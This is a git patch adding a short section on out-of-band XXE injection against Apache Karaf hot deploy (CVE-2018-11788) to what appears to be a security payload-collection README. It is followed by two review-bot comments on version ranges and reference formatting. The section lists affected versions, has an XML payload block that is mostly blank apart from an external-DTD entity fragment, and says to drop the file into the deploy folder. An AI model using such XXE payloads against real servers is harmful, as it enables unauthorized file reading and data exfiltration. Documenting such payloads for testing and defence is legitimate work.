From 333b9ea85ec421b82869680aefd7f962b2d25902 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 23 Mar 2019 15:51:16 +0100 Subject: [PATCH] add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788) --- XXE Injection/README.md | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index f85e3e3..d2d761b 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -192,6 +192,26 @@ File stored on http://127.0.0.1/dtd.xml "> ``` +### XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788) + +Affected versions: + +- Apache Karaf <= 4.2.1 +- Apache Karaf <= 4.1.6 + +```xml + + %dtd;] + + + + +``` + +Send the XML file to the `deploy` folder. + +Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) ## XXE in exotic files @@ -244,4 +264,4 @@ GIF (experimental) * [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht * [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) * [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) -* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) \ No newline at end of file +* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
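Review bot: In the first hunk, the "Affected versions" bullets give two overlapping upper bounds, since `Apache Karaf <= 4.2.1` already covers everything in `Apache Karaf <= 4.1.6`. Writing them as per-branch ranges (4.1.x up to 4.1.6, 4.2.x up to 4.2.1) would make clear that two release lines are meant. The section also stops at "Send the XML file to the `deploy` folder." without saying why that causes the XML to be parsed or which releases carry the fix. One sentence on the hot-deploy parsing behaviour and a pointer to the fixed versions in the vendor advisory would let a reader check their own exposure without opening the linked repository.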
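Review bot: The reference list at the end of the README, touched in the second hunk only to restore the trailing newline, gains no entry for the new Karaf section, which cites its source inline as `Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)` instead. The other write-ups are collected in that list as `* [title](url)` items, so adding the link there as well would keep the file consistent. The newline fix is unrelated to the subject line and would be cleaner as its own commit, or at least mentioned in the message.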